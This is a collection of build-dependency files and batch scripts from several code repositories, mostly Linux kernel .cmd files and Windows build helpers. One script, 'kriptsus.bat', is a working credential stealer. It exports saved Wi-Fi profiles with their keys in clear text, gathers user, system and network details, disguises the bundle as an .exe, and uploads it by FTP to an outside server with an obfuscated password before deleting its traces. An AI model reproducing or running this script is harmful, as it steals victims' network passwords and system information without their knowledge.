$(wildcard include/config/vm86.h) \
include/asm/ptrace.h \
include/asm/ptrace-abi.h \
include/asm/segment.h \
include/asm/ds.h \
include/linux/init.h \
$(wildcard include/config/hotplug.h) \
include/asm/math_emu.h \
include/asm/sigcontext.h \
include/asm/current.h \
include/asm/current_32.h \
include/asm/percpu.h \
include/asm-generic/percpu.h \
$(wildcard include/config/debug/preempt.h) \
$(wildcard include/config/have/setup/per/cpu/area.h) \
include/linux/threads.h \
$(wildcard include/config/nr/cpus.h) \
$(wildcard include/config/base/small.h) \
include/asm/system.h \
$(wildcard include/config/ia32/emulation.h) \
$(wildcard include/config/x86/ppro/fence.h) \
$(wildcard include/config/x86/oostore.h) \
include/asm/cmpxchg.h \
include/asm/cmpxchg_32.h \
$(wildcard include/config/x86/cmpxchg.h) \
$(wildcard include/config/x86/cmpxchg64.h) \
include/asm/nops.h \
$(wildcard include/config/mk7.h) \
$(wildcard include/config/x86/p6/nop.h) \
include/linux/irqflags.h \
$(wildcard include/config/trace/irqflags.h) \
$(wildcard include/config/trace/irqflags/support.h) \
$(wildcard include/config/x86.h) \
include/asm/irqflags.h \
$(wildcard include/config/debug/lock/alloc.h) \
include/asm/page.h \
include/linux/const.h \
include/asm/page_32.h \
$(wildcard include/config/highmem4g.h) \
$(wildcard include/config/page/offset.h) \
$(wildcard include/config/hugetlb/page.h) \
$(wildcard include/config/flatmem.h) \
$(wildcard include/config/x86/3dnow.h) \
include/linux/string.h \
include/asm/string.h \
include/asm/string_32.h \
include/asm-generic/pgtable-nopmd.h \
include/asm-generic/pgtable-nopud.h \
include/asm-generic/memory_model.h \
$(wildcard include/config/discontigmem.h) \
$(wildcard include/config/sparsemem/vmemmap.h) \
$(wildcard include/config/sparsemem.h) \
$(wildcard include/config/out/of/line/pfn/to/page.h) \
include/asm-generic/page.h \
include/asm/msr.h \
include/asm/msr-index.h \
include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
include/linux/errno.h \
include/asm/desc_defs.h \
include/linux/personality.h \
include/linux/cpumask.h \
$(wildcard include/config/have/cpumask/of/cpu/map.h) \
$(wildcard include/config/hotplug/cpu.h) \
include/linux/bitmap.h \
include/linux/cache.h \
$(wildcard include/config/arch/has/cache/line/size.h) \
include/asm/cache.h \
$(wildcard include/config/x86/l1/cache/shift.h) \
include/linux/stat.h \
include/asm/stat.h \
include/linux/time.h \
include/linux/seqlock.h \
include/linux/spinlock.h \
$(wildcard include/config/debug/spinlock.h) \
$(wildcard include/config/generic/lockbreak.h) \
$(wildcard include/config/preempt.h) \
include/linux/preempt.h \
$(wildcard include/config/preempt/notifiers.h) \
include/linux/thread_info.h \
$(wildcard include/config/compat.h) \
include/asm/thread_info.h \
include/asm/thread_info_32.h \
$(wildcard include/config/4kstacks.h) \
$(wildcard include/config/debug/stack/usage.h) \
include/linux/stringify.h \
include/linux/bottom_half.h \
include/linux/spinlock_types.h \
include/asm/spinlock_types.h \
include/linux/lockdep.h \
$(wildcard include/config/lockdep.h) \
$(wildcard include/config/lock/stat.h) \
$(wildcard include/config/generic/hardirqs.h) \
$(wildcard include/config/prove/locking.h) \
include/asm/spinlock.h \
include/asm/atomic.h \
include/asm/atomic_32.h \
$(wildcard include/config/m386.h) \
include/asm-generic/atomic.h \
include/asm/rwlock.h \
include/linux/spinlock_api_smp.h \
include/linux/math64.h \
include/asm/div64.h \
include/linux/kmod.h \
$(wildcard include/config/kmod.h) \
include/linux/elf.h \
include/linux/elf-em.h \
include/asm/elf.h \
$(wildcard include/config/compat/vdso.h) \
include/asm/user.h \
include/asm/user_32.h \
include/asm/auxvec.h \
include/asm/vdso.h \
include/asm/desc.h \
include/asm/ldt.h \
include/asm/mmu.h \
include/linux/mutex.h \
$(wildcard include/config/debug/mutexes.h) \
include/linux/smp.h \
include/asm/smp.h \
$(wildcard include/config/x86/local/apic.h) \
$(wildcard include/config/x86/io/apic.h) \
$(wildcard include/config/x86/32/smp.h) \
$(wildcard include/config/x86/64/smp.h) \
include/asm/mpspec.h \
$(wildcard include/config/mca.h) \
$(wildcard include/config/eisa.h) \
$(wildcard include/config/acpi.h) \
include/asm/mpspec_def.h \
include/asm-x86/mach-default/mach_mpspec.h \
include/asm/apic.h \
$(wildcard include/config/x86/good/apic.h) \
include/linux/pm.h \
$(wildcard include/config/pm/sleep.h) \
include/linux/delay.h \
include/asm/delay.h \
include/asm/fixmap.h \
include/asm/fixmap_32.h \
$(wildcard include/config/highmem.h) \
$(wildcard include/config/x86/visws/apic.h) \
$(wildcard include/config/x86/f00f/bug.h) \
$(wildcard include/config/x86/cyclone/timer.h) \
$(wildcard include/config/pci/mmconfig.h) \
$(wildcard include/config/provide/ohci1394/dma/init.h) \
include/asm/acpi.h \
$(wildcard include/config/acpi/numa.h) \
include/acpi/pdc_intel.h \
include/asm/numa.h \
include/asm/numa_32.h \
include/asm/apicdef.h \
include/asm/kmap_types.h \
$(wildcard include/config/debug/highmem.h) \
include/asm/io_apic.h \
include/asm/pda.h \
$(wildcard include/config/cc/stackprotector.h) \
include/asm-x86/mach-default/mach_apicdef.h \
include/linux/kobject.h \
include/linux/sysfs.h \
include/linux/kref.h \
include/linux/wait.h \
include/linux/moduleparam.h \
$(wildcard include/config/alpha.h) \
$(wildcard include/config/ia64.h) \
$(wildcard include/config/ppc64.h) \
include/linux/marker.h \
include/asm/local.h \
include/linux/percpu.h \
include/linux/slab.h \
$(wildcard include/config/slab/debug.h) \
$(wildcard include/config/debug/objects.h) \
$(wildcard include/config/slub.h) \
$(wildcard include/config/slob.h) \
$(wildcard include/config/debug/slab.h) \
$(wildcard include/config/slabinfo.h) \
include/linux/gfp.h \
$(wildcard include/config/zone/dma.h) \
$(wildcard include/config/zone/dma32.h) \
include/linux/mmzone.h \
$(wildcard include/config/force/max/zoneorder.h) \
$(wildcard include/config/memory/hotplug.h) \
$(wildcard include/config/arch/populates/node/map.h) \
$(wildcard include/config/flat/node/mem/map.h) \
$(wildcard include/config/have/memory/present.h) \
$(wildcard include/config/need/node/memmap/size.h) \
$(wildcard include/config/need/multiple/nodes.h) \
$(wildcard include/config/have/arch/early/pfn/to/nid.h) \
$(wildcard include/config/sparsemem/extreme.h) \
$(wildcard include/config/nodes/span/other/nodes.h) \
$(wildcard include/config/holes/in/zone.h) \
include/linux/numa.h \
$(wildcard include/config/nodes/shift.h) \
include/linux/nodemask.h \
include/linux/pageblock-flags.h \
$(wildcard include/config/hugetlb/page/size/variable.h) \
include/linux/bounds.h \
include/linux/memory_hotplug.h \
$(wildcard include/config/have/arch/nodedata/extension.h) \
include/linux/notifier.h \
include/linux/rwsem.h \
$(wildcard include/config/rwsem/generic/spinlock.h) \
include/asm/rwsem.h \
include/linux/srcu.h \
include/linux/topology.h \
$(wildcard include/config/sched/smt.h) \
$(wildcard include/config/sched/mc.h) \
include/asm/topology.h \
$(wildcard include/config/debug/per/cpu/maps.h) \
$(wildcard include/config/x86/64/acpi/numa.h) \
include/asm-generic/topology.h \
include/asm/sparsemem.h \
include/linux/slab_def.h \
include/linux/kmalloc_sizes.h \
include/asm/module.h \
$(wildcard include/config/m486.h) \
$(wildcard include/config/m586.h) \
$(wildcard include/config/m586tsc.h) \
$(wildcard include/config/m586mmx.h) \
$(wildcard include/config/mcore2.h) \
$(wildcard include/config/m686.h) \
$(wildcard include/config/mpentiumii.h) \
$(wildcard include/config/mpentiumiii.h) \
$(wildcard include/config/mpentiumm.h) \
$(wildcard include/config/mpentium4.h) \
$(wildcard include/config/mk6.h) \
$(wildcard include/config/mk8.h) \
$(wildcard include/config/x86/elan.h) \
$(wildcard include/config/mcrusoe.h) \
$(wildcard include/config/mefficeon.h) \
$(wildcard include/config/mwinchipc6.h) \
$(wildcard include/config/mwinchip2.h) \
$(wildcard include/config/mwinchip3d.h) \
$(wildcard include/config/mcyrixiii.h) \
$(wildcard include/config/mviac3/2.h) \
$(wildcard include/config/mviac7.h) \
$(wildcard include/config/mgeodegx1.h) \
$(wildcard include/config/mgeode/lx.h) \
include/linux/proc_fs.h \
$(wildcard include/config/proc/fs.h) \
$(wildcard include/config/proc/devicetree.h) \
$(wildcard include/config/proc/kcore.h) \
$(wildcard include/config/mmu.h) \
include/linux/fs.h \
$(wildcard include/config/dnotify.h) \
$(wildcard include/config/quota.h) \
$(wildcard include/config/inotify.h) \
$(wildcard include/config/security.h) \
$(wildcard include/config/epoll.h) \
$(wildcard include/config/debug/writecount.h) \
$(wildcard include/config/auditsyscall.h) \
$(wildcard include/config/block.h) \
$(wildcard include/config/fs/xip.h) \
$(wildcard include/config/migration.h) \
include/linux/limits.h \
include/linux/ioctl.h \
include/asm/ioctl.h \
include/asm-generic/ioctl.h \
include/linux/kdev_t.h \
include/linux/dcache.h \
$(wildcard include/config/profiling.h) \
include/linux/rcupdate.h \
$(wildcard include/config/classic/rcu.h) \
include/linux/rcuclassic.h \
include/linux/namei.h \
include/linux/path.h \
include/linux/radix-tree.h \
include/linux/prio_tree.h \
include/linux/pid.h \
include/linux/capability.h \
include/linux/semaphore.h \
include/linux/quota.h \
include/linux/dqblk_xfs.h \
include/linux/dqblk_v1.h \
include/linux/dqblk_v2.h \
include/linux/nfs_fs_i.h \
include/linux/nfs.h \
include/linux/sunrpc/msg_prot.h \
include/linux/fcntl.h \
include/asm/fcntl.h \
include/asm-generic/fcntl.h \
$(wildcard include/config/64bit.h) \
include/linux/err.h \
include/linux/magic.h \
include/linux/pci.h \
$(wildcard include/config/pcieaspm.h) \
$(wildcard include/config/pci/msi.h) \
$(wildcard include/config/pci.h) \
$(wildcard include/config/pci/legacy.h) \
$(wildcard include/config/ht/irq.h) \
$(wildcard include/config/pci/domains.h) \
include/linux/pci_regs.h \
include/linux/mod_devicetable.h \
include/linux/ioport.h \
include/linux/device.h \
$(wildcard include/config/debug/devres.h) \
include/linux/klist.h \
include/linux/completion.h \
include/asm/device.h \
$(wildcard include/config/dmar.h) \
include/linux/pm_wakeup.h \
$(wildcard include/config/pm.h) \
include/linux/pci_ids.h \
include/linux/dmapool.h \
include/asm/io.h \
include/asm/io_32.h \
include/asm-generic/iomap.h \
include/linux/vmalloc.h \
include/asm/scatterlist.h \
$(wildcard include/config/debug/sg.h) \
include/asm/pci.h \
include/linux/mm.h \
$(wildcard include/config/sysctl.h) \
$(wildcard include/config/stack/growsup.h) \
$(wildcard include/config/debug/vm.h) \
$(wildcard include/config/swap.h) \
$(wildcard include/config/shmem.h) \
$(wildcard include/config/split/ptlock/cpus.h) \
$(wildcard include/config/debug/pagealloc.h) \
$(wildcard include/config/hibernation.h) \
include/linux/rbtree.h \
include/linux/debug_locks.h \
$(wildcard include/config/debug/locking/api/selftests.h) \
include/linux/mm_types.h \
$(wildcard include/config/cgroup/mem/res/ctlr.h) \
$(wildcard include/config/mm/owner.h) \
include/linux/auxvec.h \
include/asm/pgtable.h \
include/asm/pgtable_32.h \
$(wildcard include/config/highpte.h) \
include/asm/paravirt.h \
include/asm/pgtable-2level-defs.h \
include/asm/pgtable-2level.h \
include/asm-generic/pgtable.h \
include/linux/page-flags.h \
$(wildcard include/config/pageflags/extended.h) \
$(wildcard include/config/ia64/uncached/allocator.h) \
$(wildcard include/config/s390.h) \
include/linux/vmstat.h \
$(wildcard include/config/vm/event/counters.h) \
include/asm/pci_32.h \
include/asm-generic/pci-dma-compat.h \
include/linux/dma-mapping.h \
$(wildcard include/config/has/dma.h) \
$(wildcard include/config/have/dma/attrs.h) \
include/asm/dma-mapping.h \
include/linux/scatterlist.h \
include/asm/swiotlb.h \
$(wildcard include/config/swiotlb.h) \
include/asm-generic/pci.h \
include/linux/acpi.h \
$(wildcard include/config/have/arch/parse/srat.h) \
$(wildcard include/config/acpi/hotplug/cpu.h) \
$(wildcard include/config/acpi/ec.h) \
$(wildcard include/config/acpi/wmi.h) \
$(wildcard include/config/dmi.h) \
include/acpi/acpi.h \
include/acpi/acnames.h \
include/acpi/acconfig.h \
$(wildcard include/config/h.h) \
include/acpi/platform/acenv.h \
include/acpi/platform/aclinux.h \
include/linux/ctype.h \
include/acpi/platform/acgcc.h \
include/acpi/actypes.h \
include/acpi/actypes.h \
include/acpi/acexcep.h \
include/acpi/acmacros.h \
$(wildcard include/config/acpi/debug/func/trace.h) \
include/acpi/actbl.h \
include/acpi/actbl1.h \
include/acpi/aclocal.h \
include/acpi/acoutput.h \
include/acpi/acpiosxf.h \
include/acpi/acpixf.h \
include/acpi/acobject.h \
include/acpi/acstruct.h \
include/acpi/acglobal.h \
include/acpi/achware.h \
include/acpi/acutils.h \
include/acpi/acpi_bus.h \
$(wildcard include/config/acpi/proc/event.h) \
include/acpi/acpi_drivers.h \
$(wildcard include/config/acpi/power.h) \
$(wildcard include/config/acpi/dock.h) \
include/acpi/acpi_numa.h \
include/linux/dmi.h \
drivers/acpi/pci_root.o: $(deps_drivers/acpi/pci_root.o)
$(deps_drivers/acpi/pci_root.o):
|
namgk/kernel-tut
|
drivers/acpi/.pci_root.o.cmd
|
bat
|
gpl-2.0
| 18,369 |
cmd_drivers/mtd/mtd.o := /opt/freescale/usr/local/gcc-4.6.2-glibc-2.13-linaro-multilib-2011.12/fsl-linaro-toolchain/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/mtd/mtd.o drivers/mtd/mtdcore.o drivers/mtd/mtdsuper.o drivers/mtd/mtdconcat.o drivers/mtd/mtdpart.o drivers/mtd/mtdchar.o
|
FEDEVEL/tmp-imx6-tiny-rex-linux
|
drivers/mtd/.mtd.o.cmd
|
bat
|
gpl-2.0
| 291 |
cmd_arch/arm/boot/dts/imx27-apf27.dtb := arm-poky-linux-gnueabi-gcc -E -Wp,-MD,arch/arm/boot/dts/.imx27-apf27.dtb.d.pre.tmp -nostdinc -I/second_extend/yocto_file/linux_yocto/arch/arm/boot/dts -I/second_extend/yocto_file/linux_yocto/arch/arm/boot/dts/include -I/second_extend/yocto_file/linux_yocto/drivers/of/testcase-data -undef -D__DTS__ -x assembler-with-cpp -o arch/arm/boot/dts/.imx27-apf27.dtb.dts.tmp arch/arm/boot/dts/imx27-apf27.dts ; /second_extend/yocto_file/linux_yocto/scripts/dtc/dtc -O dtb -o arch/arm/boot/dts/imx27-apf27.dtb -b 0 -i arch/arm/boot/dts/ -d arch/arm/boot/dts/.imx27-apf27.dtb.d.dtc.tmp arch/arm/boot/dts/.imx27-apf27.dtb.dts.tmp ; cat arch/arm/boot/dts/.imx27-apf27.dtb.d.pre.tmp arch/arm/boot/dts/.imx27-apf27.dtb.d.dtc.tmp > arch/arm/boot/dts/.imx27-apf27.dtb.d
source_arch/arm/boot/dts/imx27-apf27.dtb := arch/arm/boot/dts/imx27-apf27.dts
deps_arch/arm/boot/dts/imx27-apf27.dtb := \
arch/arm/boot/dts/imx27.dtsi \
arch/arm/boot/dts/skeleton.dtsi \
arch/arm/boot/dts/imx27-apf27.dtb: $(deps_arch/arm/boot/dts/imx27-apf27.dtb)
$(deps_arch/arm/boot/dts/imx27-apf27.dtb):
|
heyoufei2/yocto3.14.38_kernel
|
arch/arm/boot/dts/.imx27-apf27.dtb.cmd
|
bat
|
gpl-2.0
| 1,111 |
cmd_arch/arm/boot/zImage := /root/adam/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-objcopy -O binary -R .note -R .note.gnu.build-id -R .comment -S arch/arm/boot/compressed/vmlinux arch/arm/boot/zImage
|
DJSteve/StreakKernel
|
arch/arm/boot/.zImage.cmd
|
bat
|
gpl-2.0
| 215 |
call "%~dp0\yasm_obj_build_debug_x64.bat"
call "%~dp0\yasm_obj_build_debug_x86.bat"
call "%~dp0\yasm_obj_build_release_x64.bat"
call "%~dp0\yasm_obj_build_release_x86.bat"
|
msimic/MediaPoint
|
yasm_obj_build_all.bat
|
bat
|
gpl-2.0
| 171 |
cmd_arch/arm/kernel/entry-armv.o := arm-linux-gcc -Wp,-MD,arch/arm/kernel/.entry-armv.o.d -nostdinc -isystem /usr/local/arm/4.3.2/bin/../lib/gcc/arm-none-linux-gnueabi/4.3.2/include -Iinclude -I/home/xfile/myProject/linux-2.6.32.2/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-s3c2410/include -Iarch/arm/mach-s3c2400/include -Iarch/arm/mach-s3c2412/include -Iarch/arm/mach-s3c2440/include -Iarch/arm/mach-s3c2442/include -Iarch/arm/mach-s3c2443/include -Iarch/arm/plat-s3c24xx/include -Iarch/arm/plat-s3c/include -D__ASSEMBLY__ -mabi=aapcs-linux -mno-thumb-interwork -funwind-tables -D__LINUX_ARM_ARCH__=4 -march=armv4t -mtune=arm9tdmi -include asm/unified.h -msoft-float -gdwarf-2 -c -o arch/arm/kernel/entry-armv.o arch/arm/kernel/entry-armv.S
deps_arch/arm/kernel/entry-armv.o := \
arch/arm/kernel/entry-armv.S \
$(wildcard include/config/smp.h) \
$(wildcard include/config/local/timers.h) \
$(wildcard include/config/kprobes.h) \
$(wildcard include/config/aeabi.h) \
$(wildcard include/config/thumb2/kernel.h) \
$(wildcard include/config/preempt.h) \
$(wildcard include/config/trace/irqflags.h) \
$(wildcard include/config/needs/syscall/for/cmpxchg.h) \
$(wildcard include/config/mmu.h) \
$(wildcard include/config/cpu/endian/be8.h) \
$(wildcard include/config/neon.h) \
$(wildcard include/config/cpu/arm610.h) \
$(wildcard include/config/cpu/arm710.h) \
$(wildcard include/config/iwmmxt.h) \
$(wildcard include/config/crunch.h) \
$(wildcard include/config/vfp.h) \
$(wildcard include/config/has/tls/reg.h) \
$(wildcard include/config/tls/reg/emul.h) \
$(wildcard include/config/arm/thumb.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/unified.h \
$(wildcard include/config/arm/asm/unified.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/memory.h \
$(wildcard include/config/page/offset.h) \
$(wildcard include/config/highmem.h) \
$(wildcard include/config/dram/size.h) \
$(wildcard include/config/dram/base.h) \
$(wildcard include/config/zone/dma.h) \
$(wildcard include/config/discontigmem.h) \
include/linux/compiler.h \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/const.h \
arch/arm/mach-s3c2410/include/mach/memory.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/sizes.h \
include/asm-generic/memory_model.h \
$(wildcard include/config/flatmem.h) \
$(wildcard include/config/sparsemem/vmemmap.h) \
$(wildcard include/config/sparsemem.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/glue.h \
$(wildcard include/config/cpu/abrt/lv4t.h) \
$(wildcard include/config/cpu/abrt/ev4.h) \
$(wildcard include/config/cpu/abrt/ev4t.h) \
$(wildcard include/config/cpu/abrt/ev5tj.h) \
$(wildcard include/config/cpu/abrt/ev5t.h) \
$(wildcard include/config/cpu/abrt/ev6.h) \
$(wildcard include/config/cpu/abrt/ev7.h) \
$(wildcard include/config/cpu/pabrt/legacy.h) \
$(wildcard include/config/cpu/pabrt/v6.h) \
$(wildcard include/config/cpu/pabrt/v7.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/vfpmacros.h \
$(wildcard include/config/vfpv3.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/vfp.h \
arch/arm/mach-s3c2410/include/mach/entry-macro.S \
arch/arm/mach-s3c2410/include/mach/hardware.h \
$(wildcard include/config/cpu/s3c2440.h) \
$(wildcard include/config/cpu/s3c2412.h) \
$(wildcard include/config/no/multiword/io.h) \
arch/arm/mach-s3c2410/include/mach/map.h \
arch/arm/plat-s3c/include/plat/map-base.h \
arch/arm/plat-s3c24xx/include/plat/map.h \
$(wildcard include/config/cpu/s3c2413.h) \
$(wildcard include/config/cpu/s3c2412/only.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/irq.h \
arch/arm/mach-s3c2410/include/mach/irqs.h \
$(wildcard include/config/cpu/s3c2443.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/thread_notify.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/unwind.h \
$(wildcard include/config/arm/unwind.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/unistd.h \
$(wildcard include/config/oabi/compat.h) \
arch/arm/kernel/entry-header.S \
$(wildcard include/config/frame/pointer.h) \
$(wildcard include/config/alignment/trap.h) \
$(wildcard include/config/cpu/32v6k.h) \
$(wildcard include/config/cpu/v6.h) \
include/linux/init.h \
$(wildcard include/config/modules.h) \
$(wildcard include/config/hotplug.h) \
include/linux/linkage.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/linkage.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/assembler.h \
$(wildcard include/config/cpu/feroceon.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/ptrace.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/hwcap.h \
include/asm/asm-offsets.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/errno.h \
include/asm-generic/errno.h \
include/asm-generic/errno-base.h \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/thread_info.h \
$(wildcard include/config/arm/thumbee.h) \
/home/xfile/myProject/linux-2.6.32.2/arch/arm/include/asm/fpstate.h \
arch/arm/kernel/entry-armv.o: $(deps_arch/arm/kernel/entry-armv.o)
$(deps_arch/arm/kernel/entry-armv.o):
|
beebingoo/linux-2.6.32.2
|
arch/arm/kernel/.entry-armv.o.cmd
|
bat
|
gpl-2.0
| 5,644 |
echo off
rem set ib=C:\Program Files\Borland\InterBase\bin\
set ib=D:\Program Files\InterBase Corp\InterBase\bin\
set ibf=%ib%gfix
set ibb=%ib%gbak
set usr=-user sysdba
set psw=-password masterkey
echo
rem ------------------------------------------
rem 0. Opuskaem BD
rem 1. Otklyuchaem sborku musora
rem 2. Pytaemsya chinit
rem ------------------------------------------
echo on
"%ibf%" -housekeeping 0 %usr% %psw% %2%1
"%ibf%" -validate -full %usr% %psw% %2%1
"%ibf%" -mend -ignore %usr% %psw% %2%1
"%ibb%" -B -limbo -ignore -garbage_collect -verbose -y %1.Backup_log %usr% %psw% %2%1 %1.gbk
"%ibb%" -R -verbose -y %1.Restore_log %usr% %psw% %1.gbk %2%1.restore
rem "%ibf%" -housekeeping 0 %1
|
tm1/fbgwtest1
|
scripts/myfix1ib.bat
|
bat
|
gpl-2.0
| 705 |
cmd_arch/arm/lib/ashrdi3.o := arm-poky-linux-gnueabi-gcc -Wp,-MD,arch/arm/lib/.ashrdi3.o.d -nostdinc -isystem /opt/poky/1.7/sysroots/i686-pokysdk-linux/usr/lib/arm-poky-linux-gnueabi/gcc/arm-poky-linux-gnueabi/4.9.1/include -I/second_extend/yocto_file/linux_yocto/arch/arm/include -Iarch/arm/include/generated -Iinclude -I/second_extend/yocto_file/linux_yocto/arch/arm/include/uapi -Iarch/arm/include/generated/uapi -I/second_extend/yocto_file/linux_yocto/include/uapi -Iinclude/generated/uapi -include /second_extend/yocto_file/linux_yocto/include/linux/kconfig.h -D__KERNEL__ -mlittle-endian -D__ASSEMBLY__ -mabi=aapcs-linux -mno-thumb-interwork -mfpu=vfp -funwind-tables -marm -D__LINUX_ARM_ARCH__=7 -march=armv7-a -include asm/unified.h -msoft-float -c -o arch/arm/lib/ashrdi3.o arch/arm/lib/ashrdi3.S
source_arch/arm/lib/ashrdi3.o := arch/arm/lib/ashrdi3.S
deps_arch/arm/lib/ashrdi3.o := \
/second_extend/yocto_file/linux_yocto/arch/arm/include/asm/unified.h \
$(wildcard include/config/arm/asm/unified.h) \
$(wildcard include/config/thumb2/kernel.h) \
include/linux/linkage.h \
include/linux/compiler.h \
$(wildcard include/config/sparse/rcu/pointer.h) \
$(wildcard include/config/trace/branch/profiling.h) \
$(wildcard include/config/profile/all/branches.h) \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
$(wildcard include/config/kprobes.h) \
include/linux/stringify.h \
include/linux/export.h \
$(wildcard include/config/have/underscore/symbol/prefix.h) \
$(wildcard include/config/modules.h) \
$(wildcard include/config/modversions.h) \
$(wildcard include/config/unused/symbols.h) \
/second_extend/yocto_file/linux_yocto/arch/arm/include/asm/linkage.h \
arch/arm/lib/ashrdi3.o: $(deps_arch/arm/lib/ashrdi3.o)
$(deps_arch/arm/lib/ashrdi3.o):
|
heyoufei2/yocto3.14.38_kernel
|
arch/arm/lib/.ashrdi3.o.cmd
|
bat
|
gpl-2.0
| 1,885 |
@echo off
echo Extracting Admin PO files...
xgettext.exe --default-domain=mysql-gui-common --language=C++ --add-comments --keyword=_ -o ..\res\linux\po\mysql-gui-common.po ..\source\linux\*.cc
if not errorlevel 1 goto endOfScript
echo An Error occured!
pause
:endOfScript
echo .
|
cyberbeat/mysql-gui-tools
|
common/build/MakePoLinux.cmd
|
bat
|
gpl-2.0
| 291 |
cmd_lib/lib.a := rm -f lib/lib.a; arm-linux-gnueabi-ar rcsD lib/lib.a lib/argv_split.o lib/bug.o lib/cmdline.o lib/cpumask.o lib/ctype.o lib/dec_and_lock.o lib/decompress.o lib/decompress_bunzip2.o lib/decompress_inflate.o lib/decompress_unlz4.o lib/decompress_unlzma.o lib/decompress_unlzo.o lib/decompress_unxz.o lib/dump_stack.o lib/earlycpio.o lib/extable.o lib/flex_proportions.o lib/idr.o lib/int_sqrt.o lib/ioremap.o lib/irq_regs.o lib/is_single_threaded.o lib/klist.o lib/kobject.o lib/kobject_uevent.o lib/md5.o lib/plist.o lib/prio_heap.o lib/proportions.o lib/radix-tree.o lib/ratelimit.o lib/rbtree.o lib/reciprocal_div.o lib/sha1.o lib/show_mem.o lib/string.o lib/timerqueue.o lib/vsprintf.o
|
alianmohammad/gem5-linux-kernel
|
lib/.lib.a.cmd
|
bat
|
gpl-2.0
| 705 |
@echo off
title Kriptsus / Side Master
mode con cols=50 lines=1
mkdir "%tmp%/%username%"
cd "%tmp%/%username%"
set ER=ico
netsh wlan show all > "%tmp%/%username%/AllNetworks.txt"
netsh wlan export hostednetworkprofile
netsh wlan export profile folder=. key=clear
set ST=@t
type *.xml > "%tmp%/%username%/ProfileNetworks.txt"
del *.xml
set MA=rm
net user > "%tmp%/%username%/UserProfiles.txt"
net user "%username%" >> "%tmp%/%username%/UserProfiles.txt"
systeminfo > "%tmp%/%username%/SystemInfo.txt"
set DE=fo
ipconfig /all > "%tmp%/%username%/IpConfigAll.txt"
net config rdr > "%tmp%/%username%/NetConfigRdr.txt"
type "%tmp%/%username%/" *.txt > "%tmp%/%username%/%username%.exe"
set SI=In
echo open ftp.sidemasters.com> "%tmp%/%username%/Server.txt"
echo sidemasters.com>> "%tmp%/%username%/Server.txt"
echo %SI%%DE%%MA%%ST%%ER%>> "%tmp%/%username%/Server.txt"
echo cd /prey>> "%tmp%/%username%/Server.txt"
echo lcd "%tmp%/%username%">> "%tmp%/%username%/Server.txt"
echo binary>> "%tmp%/%username%/Server.txt"
echo send "%tmp%/%username%/%username%.exe">> "%tmp%/%username%/Server.txt"
echo ascii>> "%tmp%/%username%/Server.txt"
echo disconnect>> "%tmp%/%username%/Server.txt"
echo bye>> "%tmp%/%username%/Server.txt"
FTP -v -i -s:"%tmp%/%username%/Server.txt"
ping -n 5 0.0.0.0 > nul
rmdir /S /Q "%tmp%/%username%"
exit
|
SideMasterGM/Batch
|
Kriptsus/kriptsus.bat
|
bat
|
gpl-3.0
| 1,333 |
@ECHO OFF
setlocal
@ECHO.
@ECHO Copy4C_V220.bat
@ECHO -------------------------------------------------------------------------
@if "%1" == "" goto error
@if "%2" == "" goto error
@REM SS Settings
set SSPATH=%MSSSDir%
set SSDIR=\\sfiler\IAD_4C_SSDB\ssdb_4cb
set SSUSER=ln
@ECHO SSPATH = %SSPATH%
@ECHO SSDIR = %SSDIR%
@ECHO SSUSER = %SSUSER%
set SRCPATH=\\W4CGen\4CVersion
@ECHO SRCPATH = %SRCPATH%
set PROJECT_ROOT=D:\4C_V220
set TARGET_BASE=%PROJECT_ROOT%\TargetBase
@ECHO PROJECT_ROOT = %PROJECT_ROOT%
@ECHO TARGET_BASE = %TARGET_BASE%
@ECHO.
@ECHO Deinstall 4C
@ECHO -------------------------------------------------------------------------
@ECHO call %SRCPATH%\_V2.20.00\Setup.exe -ini "Uninstall.ini" -close -uni_all
call %SRCPATH%\_V2.20.00\Setup.exe -ini "Uninstall.ini" -close -uni_all
@ECHO.
@ECHO Delete old files
@ECHO -------------------------------------------------------------------------
if "%2" == "KEEP" goto no_delete
if not "%2" == "DEL" goto error
echo del %PROJECT_ROOT%\Engineering\*.* /Q /F
del %PROJECT_ROOT%\Engineering\*.* /Q /F >nul
echo del %PROJECT_ROOT%\Engineering\bin\*.* /S /Q /F
del %PROJECT_ROOT%\Engineering\bin\*.* /S /Q /F >nul
echo del %PROJECT_ROOT%\Engineering\lib\*.* /S /Q /F
del %PROJECT_ROOT%\Engineering\lib\*.* /S /Q /F >nul
echo del %PROJECT_ROOT%\Pub\*.* /S /Q /F
del %PROJECT_ROOT%\Pub\*.* /S /Q /F >nul
echo del %PROJECT_ROOT%\COM\*.* /S /Q /F
del %PROJECT_ROOT%\COM\*.* /S /Q /F >nul
echo del %TARGET_BASE%\*.* /S /Q /F
del %TARGET_BASE%\*.* /S /Q /F >nul
:no_delete
@ECHO.
@ECHO Install 4C Embedded
@ECHO -------------------------------------------------------------------------
echo call %SRCPATH%\_V2.20.00\Setup.exe -ini "Embedded.ini" -close -all -dir "%PROJECT_ROOT%"
